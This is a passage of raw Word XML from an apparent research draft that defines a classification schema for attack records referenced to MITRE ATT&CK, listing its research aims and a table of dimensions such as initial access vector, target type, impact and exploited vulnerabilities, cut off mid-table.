    <w:p w14:paraId="7CFACE4A" w14:textId="7B266821" w:rsidR="00E24B2B" w:rsidRDefault="00FD1DF2" w:rsidP="00E24B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>To allow researchers easier access to processable attack data to aid research in areas</w:t>
      </w:r>
      <w:r w:rsidR="00083F07">
        <w:t>, examples include</w:t>
      </w:r>
      <w:r w:rsidR="00AA7155">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kill chain models</w:t>
      </w:r>
      <w:r w:rsidR="00083F07">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00AA7155">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>event correlation models that can provide cyber analysts better awareness of higher-level attacks steps</w:t>
      </w:r>
      <w:r w:rsidR="00AA7155">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7894B8" w14:textId="735F630C" w:rsidR="00083F07" w:rsidRDefault="00FB7A79" w:rsidP="00E24B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Researchers working directly on the data to: refine the model further, develop useful data analytics to further support external researchers, develop standards to aid and encourage analysts to provide more example attack intelligence, link to other open CTI data sources in particular CAPEC, CWE and CVE knowledge bases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D67C01E" w14:textId="0CB4593A" w:rsidR="00FB7A79" w:rsidRDefault="00FB7A79" w:rsidP="00FB7A79">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Provide a resource to match detected ATT&amp;CK technique chains to </w:t>
      </w:r>
      <w:r w:rsidR="00636BF2">
        <w:t>documented attacks aiding next step prediction and prioritise appropriate courses of action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCFBAF7" w14:textId="25449F13" w:rsidR="00882E5E" w:rsidRDefault="00882E5E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="549773CB" w14:textId="77777777" w:rsidR="00882E5E" w:rsidRPr="00E17CC2" w:rsidRDefault="00882E5E" w:rsidP="00FB7A79">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F039DC4" w14:textId="6BFEB1C9" w:rsidR="00A172DC" w:rsidRDefault="00A172DC" w:rsidP="00A172DC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc110935492"/>
      <w:bookmarkStart w:id="5" w:name="_Toc153480830"/>
      <w:r>
        <w:t>An Attack Classification Model for ATT&amp;CK References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="24F7573E" w14:textId="78865504" w:rsidR="00453358" w:rsidRPr="00453358" w:rsidRDefault="00453358" w:rsidP="00453358">
      <w:r>
        <w:t>This classification model is based on various preceding models described below (1.</w:t>
      </w:r>
      <w:r w:rsidR="00C71263">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and 1.</w:t>
      </w:r>
      <w:r w:rsidR="00C71263">
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00FD1DF2">
        <w:t>. Further justification to be documented.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2405"/>
        <w:gridCol w:w="3119"/>
        <w:gridCol w:w="2551"/>
      </w:tblGrid>
      <w:tr w:rsidR="005B7274" w:rsidRPr="002D1D50" w14:paraId="001E6818" w14:textId="77777777" w:rsidTr="00880853">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55A2FBCD" w14:textId="77777777" w:rsidR="005B7274" w:rsidRPr="002D1D50" w:rsidRDefault="005B7274" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="6" w:name="_Hlk108984663"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68A2DBC2" w14:textId="213A322E" w:rsidR="005B7274" w:rsidRPr="002D1D50" w:rsidRDefault="00C045CA" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AD59E15" w14:textId="77777777" w:rsidR="005B7274" w:rsidRPr="00387DCC" w:rsidRDefault="005B7274" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C045CA" w:rsidRPr="00B857D7" w14:paraId="35E04D2C" w14:textId="77777777" w:rsidTr="00880853">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1864FC23" w14:textId="19ED1CD9" w:rsidR="00C045CA" w:rsidRDefault="00C045CA" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75299916" w14:textId="21E7803E" w:rsidR="00C045CA" w:rsidRDefault="00C045CA" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Possible APT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57E2E10B" w14:textId="3B8EEC86" w:rsidR="00C045CA" w:rsidRPr="00387DCC" w:rsidRDefault="00751EBC" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>From Controlled List</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B7274" w:rsidRPr="00B857D7" w14:paraId="091DC6D4" w14:textId="77777777" w:rsidTr="00880853">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="298C19BE" w14:textId="77777777" w:rsidR="005B7274" w:rsidRPr="007328DE" w:rsidRDefault="005B7274" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EC44A44" w14:textId="442D7EFF" w:rsidR="005B7274" w:rsidRPr="007328DE" w:rsidRDefault="00BD3ABE" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>The MITRE Initial Access vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B61FC6D" w14:textId="0F0B9F34" w:rsidR="005B7274" w:rsidRPr="00387DCC" w:rsidRDefault="00751EBC" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>List ATT&amp;CK Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B7274" w:rsidRPr="00B857D7" w14:paraId="1D84453A" w14:textId="77777777" w:rsidTr="00880853">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="566175B3" w14:textId="77777777" w:rsidR="005B7274" w:rsidRDefault="005B7274" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76B39123" w14:textId="77777777" w:rsidR="005B7274" w:rsidRDefault="00BD3ABE" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Potential source of attack. These cannot be considered as true attribution but will be based on ATT&amp;CK/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TCert</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> intelligence</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73ED4730" w14:textId="792AB6CB" w:rsidR="0004736D" w:rsidRPr="0004736D" w:rsidRDefault="0004736D" w:rsidP="0004736D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70D1039B" w14:textId="55F9095F" w:rsidR="005B7274" w:rsidRPr="00387DCC" w:rsidRDefault="00751EBC" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>From Controlled List</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B7274" w:rsidRPr="00B857D7" w14:paraId="744EA726" w14:textId="77777777" w:rsidTr="00880853">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7660758B" w14:textId="77777777" w:rsidR="005B7274" w:rsidRDefault="005B7274" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D8A4D87" w14:textId="3C031A25" w:rsidR="005B7274" w:rsidRDefault="00BD3ABE" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">The location of the actual attack. </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DCD33F1" w14:textId="1F7E63B8" w:rsidR="005B7274" w:rsidRPr="00387DCC" w:rsidRDefault="00BD3ABE" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">From </w:t>
            </w:r>
            <w:r w:rsidR="00751EBC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Controlled </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B7274" w:rsidRPr="00B857D7" w14:paraId="0F201D2B" w14:textId="77777777" w:rsidTr="00880853">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="086F4DBA" w14:textId="77777777" w:rsidR="005B7274" w:rsidRDefault="005B7274" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="310581DB" w14:textId="2F34F3A7" w:rsidR="005B7274" w:rsidRDefault="00BD3ABE" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Type of organisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B538B9F" w14:textId="426DC93E" w:rsidR="005B7274" w:rsidRPr="00387DCC" w:rsidRDefault="00BD3ABE" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>From List</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B7274" w:rsidRPr="00B857D7" w14:paraId="665D6069" w14:textId="77777777" w:rsidTr="00880853">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E0BBC42" w14:textId="77777777" w:rsidR="005B7274" w:rsidRDefault="005B7274" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79B4BEBF" w14:textId="5C9A16E3" w:rsidR="005B7274" w:rsidRDefault="00356949" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>One of:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26068BE4" w14:textId="77777777" w:rsidR="00356949" w:rsidRDefault="00356949" w:rsidP="00356949">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Exfiltration (confidentiality)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64316FE2" w14:textId="77777777" w:rsidR="00356949" w:rsidRDefault="00356949" w:rsidP="00356949">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Damage (integrity and availability)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="579E2AEF" w14:textId="77777777" w:rsidR="00356949" w:rsidRDefault="00356949" w:rsidP="00356949">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Reputation (external to the target)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03420E51" w14:textId="1EBDFD8D" w:rsidR="00356949" w:rsidRDefault="00356949" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="182BE0D7" w14:textId="1542C37F" w:rsidR="005B7274" w:rsidRDefault="00BD3ABE" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">From </w:t>
            </w:r>
            <w:r w:rsidR="00B41BD2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Controlled </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B7274" w:rsidRPr="00B857D7" w14:paraId="1836052D" w14:textId="77777777" w:rsidTr="00880853">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="274897DA" w14:textId="77777777" w:rsidR="005B7274" w:rsidRDefault="005B7274" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26F65BC4" w14:textId="59AC9D34" w:rsidR="005B7274" w:rsidRDefault="005B7274" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>CVE-</w:t>
            </w:r>
            <w:r w:rsidR="00BD3ABE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>????</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00BD3ABE">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>????</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="542B3250" w14:textId="1F65460F" w:rsidR="005B7274" w:rsidRDefault="00B41BD2" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>List CVE/CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B7274" w:rsidRPr="00B857D7" w14:paraId="50FDB023" w14:textId="77777777" w:rsidTr="00880853">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B714837" w14:textId="77777777" w:rsidR="005B7274" w:rsidRDefault="005B7274" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73EC6103" w14:textId="027ED30C" w:rsidR="005B7274" w:rsidRDefault="00356949" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E5293D2" w14:textId="57583117" w:rsidR="005B7274" w:rsidRDefault="00B41BD2" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D49A8" w:rsidRPr="00B857D7" w14:paraId="58526358" w14:textId="77777777" w:rsidTr="00880853">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="597D3652" w14:textId="78F96345" w:rsidR="002D49A8" w:rsidRDefault="002D49A8" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3399BABC" w14:textId="77777777" w:rsidR="002D49A8" w:rsidRDefault="002D49A8" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B9D9B0F" w14:textId="77777777" w:rsidR="002D49A8" w:rsidRDefault="002D49A8" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D49A8" w:rsidRPr="00B857D7" w14:paraId="3277D3EC" w14:textId="77777777" w:rsidTr="00880853">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C5C92A1" w14:textId="2279A5DC" w:rsidR="002D49A8" w:rsidRDefault="002D49A8" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16720395" w14:textId="26E2103B" w:rsidR="002D49A8" w:rsidRDefault="002D49A8" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F001D7B" w14:textId="74140D9D" w:rsidR="002D49A8" w:rsidRDefault="002D49A8" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Reference </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B7274" w:rsidRPr="00B857D7" w14:paraId="062FC55D" w14:textId="77777777" w:rsidTr="00880853">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F5B082E" w14:textId="107A76A0" w:rsidR="005B7274" w:rsidRDefault="002D49A8" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5255A1E7" w14:textId="7A6C1051" w:rsidR="005B7274" w:rsidRDefault="002D49A8" w:rsidP="00010EFE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
